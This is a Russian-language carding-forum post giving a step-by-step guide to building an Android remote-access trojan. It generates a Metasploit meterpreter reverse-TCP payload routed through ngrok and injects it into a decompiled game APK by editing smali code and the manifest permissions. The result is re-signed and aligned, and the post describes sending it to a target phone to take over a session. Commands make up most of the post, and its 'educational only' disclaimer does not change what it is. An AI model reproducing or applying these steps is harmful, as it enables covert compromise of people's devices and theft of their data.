Как создать вирус удаленного доступа на Android

Carder

Professional
Messages
2,619
Reputation
9
Reaction score
1,719
Points
113
Попутно тому, как смартфоны становятся частью человеческой жизни, возникает все больше новых зловредных программ ориентированных под мобильные операционные системы. И если раньше можно было не переживать, качая софт только с официального магазина, то теперь злоумышленники научились обходить и профессиональные системы идентификации вирусов.

Разновидностей зловредов стало также больше. Под Андроид появились свои шифровальщики, стиллеры и бекдоры. О последних сегодня и пойдет речь. В качестве демонстрации будет представлен процесс создания вируса удаленного доступа, только не с помощью вспомогательных программ, а своими руками. Заражать будем тестовый apk файл с игрой.

Замечу, что эта статья написана только для образовательных целей. Мы никого ни к чему не призываем, только в целях ознакомления! Автор не несёт ответственности за ваши действия!

Инструкция

Устанавливаем Kali Linux https://www.kali.org/downloads/

Далее установим Zipalign

Code:
apt-get install -y zipalign

Ещё нам понадобятся программы keytool и jarsigner, которые находятся в Java SDK. Утилиту Apktool можно скачать запустив этот файл. Также понадобятся предустановленные ngrok и Metasploit.

Сборка бекдора

Запускаем в отдельном окне ngrok

Code:
tcp 4444

Полученные lhost и lport используем для создания пейлоада

Code:
-p android/meterpreter/reverse_tcp LHOST=<адресс lhost> LPORT=<значение lport>M> /home/kali/payload.apk

На выходе получаем apk файл. Его и файл игры, в которую будем вшивать вирус, нужно распаковать с помощью комманд

Code:
d game.apk 
apktool d payload.apk

Теперь остается преобразить загрузочный файл бекдора. Копируем папку metasploit по пути /payload/smali/com/ в /game/smali/com/. Теперь переходим в папку /game/smali/com/dotgears/game/ и открываем файл SplashScreen.smali. В нем находим метку "virtual methods" и после строки начинающейся на invoke-super, то есть на строку под номером 34, вставляем

Code:
{p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V

Теперь нужно обновить запрос разрешений при установке. Для этого переходим в папку payload и из файла AndroidManifest.xml копируем все теги uses-permission. Вставляем их в аналогичный файл AndroidManifest.xml в папке game, удалив при этом находящиеся там теги uses-permission.

Компилируем отредактированный файл игры в apk

Code:
b game

Готовый файл нужно искать в game/dist/. Остается его подписать. Генерируем подпись коммандой

Code:
-genkey -V -keystore key.keystore -alias codered -keyalg RSA -keysize 2048 -validity 1000

Получаем файл key.keystore. Теперь сертифицируем наш apk

Code:
-verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore key.keystore game.apk codered

Выравниваем подписанное приложение командой

Code:
-v 4 game.apk game_good.apk

Готово! Теперь можно захватывать сессию на целевом смартфоне отослав туда данный apk файл. Атакуемое устройство, в нашем случае, должно находиться в локальной сети с атакующим, поскольку мы изначально в целях демонстрации выбрали такие параметры в ngrok.
 
Top